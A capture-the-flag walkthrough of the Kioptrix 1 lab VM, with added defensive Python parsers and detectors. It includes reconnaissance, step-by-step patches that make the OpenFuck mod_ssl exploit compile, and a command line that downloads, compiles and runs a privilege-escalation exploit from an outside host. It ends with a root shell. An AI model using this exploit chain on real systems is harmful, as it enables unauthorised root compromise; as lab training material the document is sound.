Kioptrix 1

Source

Setting up the challenge

Download VMware Workstation and the vulnerable VM, then start it.

Scanning with nmap

Finding the vulnerable machine

nmap 10.0.1.0/24

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-17 20:02 CET
Nmap scan report for 10.0.1.104
Host is up (0.0018s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
443/tcp   open  https
32768/tcp open  filenet-tms
MAC Address: 00:0C:29:BE:28:85 (VMware)

The address is 10.0.1.104.

In depth scan

nmap -A 10.0.1.104


Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-17 15:15 CET
Nmap scan report for 10.0.1.104
Host is up (0.00047s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
139/tcp   open  netbios-ssn Samba smbd (workgroup: HMYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2018-02-16T22:42:12+00:00; -15h34m01s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:BE:28:85 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: -15h34m01s, deviation: 0s, median: -15h34m01s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 10.0.1.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 266.87 seconds

Conclusion

Characteristic     Value
Operating System   Running: Linux 2.4.X
Kernel             OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details         Linux 2.4.9 - 2.4.18 (likely embedded)
Samba              139/tcp open netbios-ssn Samba smbd (workgroup: HMYGROUP)
SSH                OpenSSH 2.9p2 (protocol 1.99)
Apache             Apache/1.3.20 (Unix)
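To turn a scan like the one above into a repeatable inventory check, here is an added example (my own code, not part of the original walkthrough) that parses the port lines and the NSE script lines of nmap's normal output and flags the legacy indicators visible on this host: SSHv1, SSLv2, the TRACE method, Apache 1.3 and OpenSSL 0.9.6. The excerpt it parses is constructed from the output above, and the rule names and patterns are assumptions chosen for the example.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt of the nmap -A output shown above (shortened to a few ports).
NMAP_OUTPUT = """\
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
139/tcp   open  netbios-ssn Samba smbd (workgroup: HMYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2:
|   SSLv2 supported
32768/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:BE:28:85 (VMware)
"""

# A port line looks like: "443/tcp   open  ssl/https   Apache/1.3.20 (Unix) ..."
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str
    script_lines: list = field(default_factory=list)  # NSE output printed under this port


def parse_nmap(text):
    """Parse nmap's normal output into Service records.

    Lines starting with '|' are NSE script output; nmap prints them directly
    below the port they belong to, so they are attached to the last port seen."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, name, version = m.groups()
            services.append(Service(int(port), proto, state, name, version.strip()))
        elif line.startswith("|") and services:
            services[-1].script_lines.append(line.lstrip("|_ ").strip())
    return services


# Legacy/weak-configuration indicators (assumed rule names, chosen for this example).
RULES = [
    ("sshv1-enabled", lambda s: any("supports SSHv1" in ln for ln in s.script_lines)),
    ("sslv2-enabled", lambda s: any("SSLv2 supported" in ln for ln in s.script_lines)),
    ("trace-enabled", lambda s: any("TRACE" in ln for ln in s.script_lines)),
    ("apache-1.3", lambda s: re.search(r"Apache(?: httpd)?[/ ]1\.3\.", s.version) is not None),
    ("openssl-0.9.6", lambda s: "OpenSSL/0.9.6" in s.version),
]


def assess(services):
    """Return {port: [finding, ...]} for every parsed service (empty list = nothing flagged)."""
    return {s.port: [name for name, check in RULES if check(s)] for s in services}


if __name__ == "__main__":
    for port, findings in assess(parse_nmap(NMAP_OUTPUT)).items():
        print(f"{port:>6}: {', '.join(findings) or 'ok'}")
```

The same parser works on a full `nmap -A` report saved with `-oN`; only the rule table needs extending for other end-of-life software.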

Scanning with dirb

dirb is used to find hidden pages by requesting the common paths from a wordlist.

dirb http://10.0.1.104/ /usr/share/wordlists/dirb/common.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Feb 17 21:49:39 2018
URL_BASE: http://10.0.1.104/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.0.1.104/ ----
+ http://10.0.1.104/~operator (CODE:403|SIZE:273)                                                                                          
+ http://10.0.1.104/~root (CODE:403|SIZE:269)                                                                                              
+ http://10.0.1.104/cgi-bin/ (CODE:403|SIZE:272)                                                                                           
+ http://10.0.1.104/index.html (CODE:200|SIZE:2890)                                                                                        
==> DIRECTORY: http://10.0.1.104/manual/                                                                                                   
==> DIRECTORY: http://10.0.1.104/mrtg/                                                                                                     
==> DIRECTORY: http://10.0.1.104/usage/                                                                                                    

---- Entering directory: http://10.0.1.104/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.0.1.104/mrtg/ ----
+ http://10.0.1.104/mrtg/index.html (CODE:200|SIZE:17318)                                                                                  

---- Entering directory: http://10.0.1.104/usage/ ----
+ http://10.0.1.104/usage/index.html (CODE:200|SIZE:3704)                                                                                  

-----------------
END_TIME: Sat Feb 17 21:50:04 2018
DOWNLOADED: 13836 - FOUND: 6

Found:

Type       Address                        Response code  Response size
File       http://10.0.1.104/~operator    403            273
File       http://10.0.1.104/~root        403            269
File       http://10.0.1.104/cgi-bin/     403            272
File       http://10.0.1.104/index.html   200            2890
DIRECTORY  http://10.0.1.104/manual/
DIRECTORY  http://10.0.1.104/mrtg/
DIRECTORY  http://10.0.1.104/usage/

Conclusion

There seem to be users named root and operator (the /~root and /~operator paths answer 403 rather than 404).

Scanning with OpenVAS

Install OpenVAS and use it to scan the address.

NVT Name | Port | Protocol | CVSS | Severity | CVEs
Webalizer Cross Site Scripting Vulnerability | 443 | tcp | 7.5 | High | CVE-2001-0835
Webalizer Cross Site Scripting Vulnerability | 80 | tcp | 7.5 | High | CVE-2001-0835
http TRACE XSS attack | 443 | tcp | 5.8 | Medium | CVE-2004-2320, CVE-2003-1567
http TRACE XSS attack | 80 | tcp | 5.8 | Medium | CVE-2004-2320, CVE-2003-1567
SSL/TLS: Certificate Expired | 443 | tcp | 5 | Medium | NOCVE
SSL/TLS: Report Vulnerable Cipher Suites for HTTPS | 443 | tcp | 5 | Medium | CVE-2016-2183, CVE-2016-6329
Apache UserDir Sensitive Information Disclosure | 443 | tcp | 5 | Medium | CVE-2001-1013
Apache UserDir Sensitive Information Disclosure | 80 | tcp | 5 | Medium | CVE-2001-1013
SSL/TLS: Untrusted Certificate Authorities | 443 | tcp | 5 | Medium | NOCVE
Apache Web Server ETag Header Information Disclosure Weakness | 443 | tcp | 4.3 | Medium | CVE-2003-1418
Apache Web Server ETag Header Information Disclosure Weakness | 80 | tcp | 4.3 | Medium | CVE-2003-1418
SSL/TLS: DHE_EXPORT Man in the Middle Security Bypass Vulnerability (LogJam) | 443 | tcp | 4.3 | Medium | CVE-2015-4000
SSL/TLS: SSLv3 Protocol CBC Cipher Suites Information Disclosure Vulnerability (POODLE) | 443 | tcp | 4.3 | Medium | CVE-2014-3566
SSL/TLS: Report Weak Cipher Suites | 443 | tcp | 4.3 | Medium | CVE-2013-2566, CVE-2015-2808, CVE-2015-4000
SSH Weak Encryption Algorithms Supported | 22 | tcp | 4.3 | Medium | NOCVE
SSL/TLS: RSA Temporary Key Handling RSA_EXPORT Downgrade Issue (FREAK) | 443 | tcp | 4.3 | Medium | CVE-2015-0204
SSL/TLS: Deprecated SSLv2 and SSLv3 Protocol Detection | 443 | tcp | 4.3 | Medium | CVE-2016-0800, CVE-2014-3566
Apache HTTP Server httpOnly Cookie Information Disclosure Vulnerability | 443 | tcp | 4.3 | Medium | CVE-2012-0053
Apache HTTP Server httpOnly Cookie Information Disclosure Vulnerability | 80 | tcp | 4.3 | Medium | CVE-2012-0053
SSL/TLS: Diffie-Hellman Key Exchange Insufficient DH Group Strength Vulnerability | 443 | tcp | 4 | Medium | NOCVE
TCP timestamps | - | - | 2.6 | Low | NOCVE
SSH Weak MAC Algorithms Supported | 22 | tcp | 2.6 | Low | NOCVE
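A scanner report like this repeats the same NVT for ports 80 and 443, so it helps to consolidate before prioritising. The following added example (my own code, not part of the walkthrough and not OpenVAS code) parses findings written in the flattened one-line-per-row form used above, merges rows that differ only by port, orders them by CVSS, and builds an index from CVE to finding names for cross-referencing with other tools. The sample rows are a constructed subset of the table above.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Constructed subset of the OpenVAS rows shown above, in the same one-line form:
#   <NVT name> [<port> <proto>] <CVSS> <severity> <CVE list or NOCVE>
REPORT = """\
Webalizer Cross Site Scripting Vulnerability 443 tcp 7.5 High CVE-2001-0835
Webalizer Cross Site Scripting Vulnerability 80 tcp 7.5 High CVE-2001-0835
http TRACE XSS attack 443 tcp 5.8 Medium CVE-2004-2320, CVE-2003-1567
http TRACE XSS attack 80 tcp 5.8 Medium CVE-2004-2320, CVE-2003-1567
Apache UserDir Sensitive Information Disclosure 443 tcp 5 Medium CVE-2001-1013
Apache UserDir Sensitive Information Disclosure 80 tcp 5 Medium CVE-2001-1013
SSL/TLS: Deprecated SSLv2 and SSLv3 Protocol Detection 443 tcp 4.3 Medium CVE-2016-0800, CVE-2014-3566
SSL/TLS: SSLv3 Protocol CBC Cipher Suites Information Disclosure Vulnerability (POODLE) 443 tcp 4.3 Medium CVE-2014-3566
TCP timestamps     2.6 Low NOCVE
SSH Weak MAC Algorithms Supported 22 tcp 2.6 Low NOCVE
"""

# Port and protocol are optional: the "TCP timestamps" row carries neither.
ROW_RE = re.compile(
    r"^(?P<name>.+?)\s+(?:(?P<port>\d+)\s+(?P<proto>tcp|udp)\s+)?"
    r"(?P<cvss>\d+(?:\.\d+)?)\s+(?P<sev>High|Medium|Low)\s+(?P<cves>.+)$"
)


@dataclass
class Finding:
    name: str
    port: Optional[int]
    proto: Optional[str]
    cvss: float
    severity: str
    cves: tuple  # empty when the scanner reports NOCVE


def parse_findings(text):
    findings = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            raise ValueError(f"unparsed row: {line!r}")
        cves = tuple(c.strip() for c in m["cves"].split(",") if c.strip() != "NOCVE")
        findings.append(Finding(m["name"], int(m["port"]) if m["port"] else None,
                                m["proto"], float(m["cvss"]), m["sev"], cves))
    return findings


def consolidate(findings):
    """Merge rows that differ only by port; return dicts sorted by CVSS (desc), then name."""
    merged = {}
    for f in findings:
        entry = merged.setdefault((f.name, f.cves), {"name": f.name, "cvss": f.cvss,
                                                     "severity": f.severity,
                                                     "cves": list(f.cves), "ports": []})
        if f.port is not None and f.port not in entry["ports"]:
            entry["ports"].append(f.port)
    for entry in merged.values():
        entry["ports"].sort()
    return sorted(merged.values(), key=lambda e: (-e["cvss"], e["name"]))


def cve_index(findings):
    """Map each CVE to the set of finding names that cite it."""
    index = defaultdict(set)
    for f in findings:
        for cve in f.cves:
            index[cve].add(f.name)
    return dict(index)


if __name__ == "__main__":
    for e in consolidate(parse_findings(REPORT)):
        print(f"{e['cvss']:>4} {e['severity']:<6} ports={e['ports']} {e['name']}")
```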

Scanning with nikto

Download or update nikto from GitHub.

./nikto.pl -h  10.0.1.104 -Format csv -o ~/Vulnhub/Kioptrix_1/nikto.csv
Port | OSVDB | Method | Path | Description
80 | - | - | - | Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
80 | OSVDB-0 | GET | / | Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep 6 05:12:46 2001
80 | OSVDB-0 | GET | / | The anti-clickjacking X-Frame-Options header is not present.
80 | OSVDB-0 | GET | / | The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
80 | OSVDB-0 | GET | / | The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
80 | OSVDB-27487 | GET | / | Apache is vulnerable to XSS via the Expect header
80 | OSVDB-0 | OPTIONS | / | Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
80 | OSVDB-877 | TRACE | / | HTTP TRACE method is active, suggesting the host is vulnerable to XST
80 | OSVDB-0 | GET | ///etc/hosts | The server install allows reading of any system file by adding an extra '/' to the URL.
80 | OSVDB-682 | GET | /usage/ | Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02.
80 | OSVDB-3268 | GET | /manual/ | Directory indexing found.
80 | OSVDB-3092 | GET | /manual/ | Web server manual found.
80 | OSVDB-3268 | GET | /icons/ | Directory indexing found.
80 | OSVDB-3233 | GET | /icons/README | Apache default file found.
80 | OSVDB-3092 | GET | /test.php | This might be interesting…

Additionally, nikto reports the following:

mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
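The nikto line about inodes refers to the way Apache 1.3 builds its ETag from three hex fields, inode-size-mtime (the same weakness OpenVAS lists as CVE-2003-1418). To see what such a header gives away, and to verify a fix afterwards, here is an added example of my own (not nikto's code and not part of the walkthrough) that decodes the fields and reports whether the inode is still present. The sample ETag is constructed from the inode and size nikto printed; the mtime field is a constructed value, not one captured from the host.

```python
import re
from datetime import datetime, timezone

# Constructed Apache 1.3-style ETag: inode 34821 (0x8805) and size 2890 (0xb4a) as
# reported by nikto above; the mtime field 0x3b9705ce is a constructed value.
SAMPLE_ETAG = '"8805-b4a-3b9705ce"'
# Constructed ETag of the shape produced after "FileETag MTime Size" (no inode component).
HARDENED_ETAG = '"b4a-3b9705ce"'

HEX_FIELD = re.compile(r"[0-9a-fA-F]+")


def etag_fields(etag):
    """Split an ETag header value into its hex fields, tolerating quotes and a W/ prefix.
    Returns None if the value is not a dash-separated list of hex fields."""
    value = etag.strip()
    if value.startswith("W/"):
        value = value[2:]
    value = value.strip('"')
    fields = value.split("-")
    if not all(HEX_FIELD.fullmatch(f) for f in fields):
        return None
    return fields


def leaks_inode(etag):
    """Apache's default FileETag (INode MTime Size) yields three fields; the inode is the first."""
    fields = etag_fields(etag)
    return fields is not None and len(fields) == 3


def decode_apache_etag(etag):
    """Decode an inode-size-mtime ETag into numbers and a UTC timestamp.

    Apache 1.3 encodes mtime in seconds, Apache 2.x in microseconds (apr_time_t);
    the two are told apart here by magnitude. Returns None for any other shape."""
    fields = etag_fields(etag)
    if fields is None or len(fields) != 3:
        return None
    inode, size, mtime = (int(f, 16) for f in fields)
    seconds = mtime // 1_000_000 if mtime >= 10**12 else mtime
    return {
        "inode": inode,
        "size": size,
        "mtime": seconds,
        "mtime_utc": datetime.fromtimestamp(seconds, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
    }


if __name__ == "__main__":
    print(decode_apache_etag(SAMPLE_ETAG))
    print("inode exposed before/after hardening:", leaks_inode(SAMPLE_ETAG), leaks_inode(HARDENED_ETAG))
```

Setting `FileETag MTime Size` in the Apache configuration drops the inode component; the header then has two fields and `leaks_inode` returns False, which is the check to run after the change.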

Apache UserDir Sensitive Information Disclosure

OpenVAS lists this vulnerability as CVE-2001-1013, described as follows:

Apache on Red Hat Linux with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.

We open msfconsole and search whether any modules are available for it:

msfconsole
msf> search CVE-2001-1013

Matching Modules
================

   Name                                        Disclosure Date  Rank    Description
   ----                                        ---------------  ----    -----------
   auxiliary/scanner/http/apache_userdir_enum                   normal  Apache "mod_userdir" User Enumeration

We run the auxiliary module that was found:

msf> use auxiliary/scanner/http/apache_userdir_enum
msf> show options
msf> set RHOSTS 10.0.1.104
msf> run
[+] http://10.0.1.104/ - Users found: operator, postgres, root
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Conclusion

The system has the users operator, postgres and root.
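The /~root and /~operator hits from dirb and the module output above are two views of the same weakness: the server's status code differs between an existing account without a public_html directory and a nonexistent one. The following added example (my own code, not the Metasploit module's and not part of the walkthrough) models that behaviour beside a uniform-response version, gives a regression check that a fix can be verified against, and scans constructed Apache access-log lines for the burst of /~name requests such enumeration leaves behind. Account names, log lines and the alert threshold are all constructed for the example.

```python
import re
from collections import defaultdict

# Constructed account table: name -> whether the account publishes a public_html directory.
ACCOUNTS = {"root": False, "operator": False, "postgres": False, "alice": True}


def vulnerable_userdir(username):
    """Pre-fix behaviour described in CVE-2001-1013: 403 for an existing account with
    no public_html, 404 for an unknown account. The two cases are distinguishable."""
    if username not in ACCOUNTS:
        return 404
    return 200 if ACCOUNTS[username] else 403


def hardened_userdir(username):
    """Uniform behaviour: anything that is not a published directory answers 404, so an
    unpublished account looks exactly like a nonexistent one (the effect of
    'UserDir disabled' for such accounts in Apache terms)."""
    return 200 if ACCOUNTS.get(username) else 404


def has_status_oracle(handler, unpublished_accounts, baseline="no_such_user_zz"):
    """Regression check: True if any unpublished account is answered differently from a
    name that certainly does not exist. A published directory is visible by design,
    so only accounts without one are compared."""
    reference = handler(baseline)
    return any(handler(name) != reference for name in unpublished_accounts)


# Constructed Apache combined-log lines (the 10.0.1.50 client walks a list of ~names).
ACCESS_LOG = """\
10.0.1.50 - - [17/Feb/2018:21:49:39 +0100] "GET /~root HTTP/1.1" 403 269 "-" "Mozilla/5.0"
10.0.1.50 - - [17/Feb/2018:21:49:39 +0100] "GET /~operator HTTP/1.1" 403 273 "-" "Mozilla/5.0"
10.0.1.50 - - [17/Feb/2018:21:49:40 +0100] "GET /~postgres HTTP/1.1" 403 270 "-" "Mozilla/5.0"
10.0.1.50 - - [17/Feb/2018:21:49:40 +0100] "GET /~nobody HTTP/1.1" 404 280 "-" "Mozilla/5.0"
10.0.1.50 - - [17/Feb/2018:21:49:40 +0100] "GET /~zzz HTTP/1.1" 404 277 "-" "Mozilla/5.0"
10.0.1.77 - - [17/Feb/2018:21:50:01 +0100] "GET /index.html HTTP/1.1" 200 2890 "-" "Mozilla/5.0"
10.0.1.77 - - [17/Feb/2018:21:50:02 +0100] "GET /~alice/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
USERDIR_RE = re.compile(r"^/~([^/?]+)")


def userdir_probe_sources(log_text, threshold):
    """Count distinct ~names requested per client; return clients at or above threshold.
    One client requesting many ~names and collecting mixed 403/404 answers is the
    signature worth alerting on."""
    names_by_ip = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        u = USERDIR_RE.match(m["path"])
        if u:
            names_by_ip[m["ip"]].add(u.group(1))
    return {ip: len(names) for ip, names in names_by_ip.items() if len(names) >= threshold}


if __name__ == "__main__":
    unpublished = [n for n, published in ACCOUNTS.items() if not published]
    print("vulnerable handler leaks:", has_status_oracle(vulnerable_userdir, unpublished))
    print("hardened handler leaks:", has_status_oracle(hardened_userdir, unpublished))
    print("probing clients:", userdir_probe_sources(ACCESS_LOG, threshold=3))
```

The log check is deliberately status-code agnostic: once the server answers uniformly, the probes still show up as one client requesting many distinct ~names, so the detection keeps working after the fix.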

mod_ssl buffer overflow

Source: Hypn.za.net

One of the popular boot-to-root VMs has an exploit (764.c) which doesn’t compile so well in modern Kali, producing the errors:

764d.c:643:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
764d.c:651:2: error: unknown type name ‘RC4_KEY’
764d.c:652:2: error: unknown type name ‘RC4_KEY’
764d.c:844:7: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764d.c:845:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
764d.c:882:2: error: unknown type name ‘MD5_CTX’
764d.c:887:23: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764d.c:977:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
764d.c:1069:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
764d.c:1106:2: error: unknown type name ‘MD5_CTX’
764d.c:1111:42: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764d.c:1127:23: error: ‘RC4_KEY’ undeclared (first use in this function)
764d.c:1127:31: error: expected expression before ‘)’ token
764d.c:1131:32: error: expected expression before ‘)’ token
764d.c:1146:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
764d.c:1158:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
764d.c:1171:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)

Luckily there was a blog post written in 2014 by @paulwebsec explaining how to update the exploit, which fixes some of them but still leaves you with:

764b.c:645:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
764b.c:847:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
764b.c:979:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
764b.c:1071:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
764b.c:1148:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
764b.c:1160:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
764b.c:1173:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)

On Kali (and likely other Debian based distros) you can work around this by simply doing an “apt-get install libssl1.0-dev” to roll back your libssl-dev version, but why don’t we get this compiling with the modern lib…

The changes to make (including Paul’s) are:

1) Add this below line 24 (the last #include):

#include <openssl/rc4.h>
#include <openssl/md5.h>

#define SSL2_MT_ERROR 0
#define SSL2_MT_CLIENT_FINISHED 3
#define SSL2_MT_SERVER_HELLO 4
#define SSL2_MT_SERVER_VERIFY 5
#define SSL2_MT_SERVER_FINISHED 6
#define SSL2_MAX_CONNECTION_ID_LENGTH 16

2) Replace “COMMAND2” on (now) line 672:

#define COMMAND2 "unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n"

3) Add “const” to the beginning of (now) line 970:

const unsigned char *p, *end;

4) Replace the “if” on (now) line 1078 with:

if (EVP_PKEY_get1_RSA(pkey) == NULL) {
  ...}

5) Replace the “encrypted_key_length” code on (now) line 1084 with:

encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);

6) Install “libssl-dev” (if not already installed):

apt-get install libssl-dev

7) Compile!

gcc -o 764 764.c -lcrypto

Exploiting the overflow

We display the usage with ./764:

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./764 target box [port] [-c N]

  target - supported box eg: 0x00
  box - hostname or IP address
  port - port for ssl connection
  -c open N connections. (use range 40-50 if u dont know)


  Supported OffSet:
	0x00 - Caldera OpenLinux (apache-1.3.26)
	0x01 - Cobalt Sun 6.0 (apache-1.3.12)
  ...
  0x0c - Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)
  0x0d - Debian GNU Linux (apache_1.3.19-1)
  0x0e - Debian GNU Linux (apache_1.3.22-2)

From the information gathered (Red Hat Linux, Apache 1.3.20) we pick the matching offset and exploit the vulnerability with:

./764 0x6b 10.0.1.104 443
Output
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304
--22:08:06--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   1.87 MB/s

22:08:07 (1.87 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 8110
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...

From there we now have a remote shell with root access!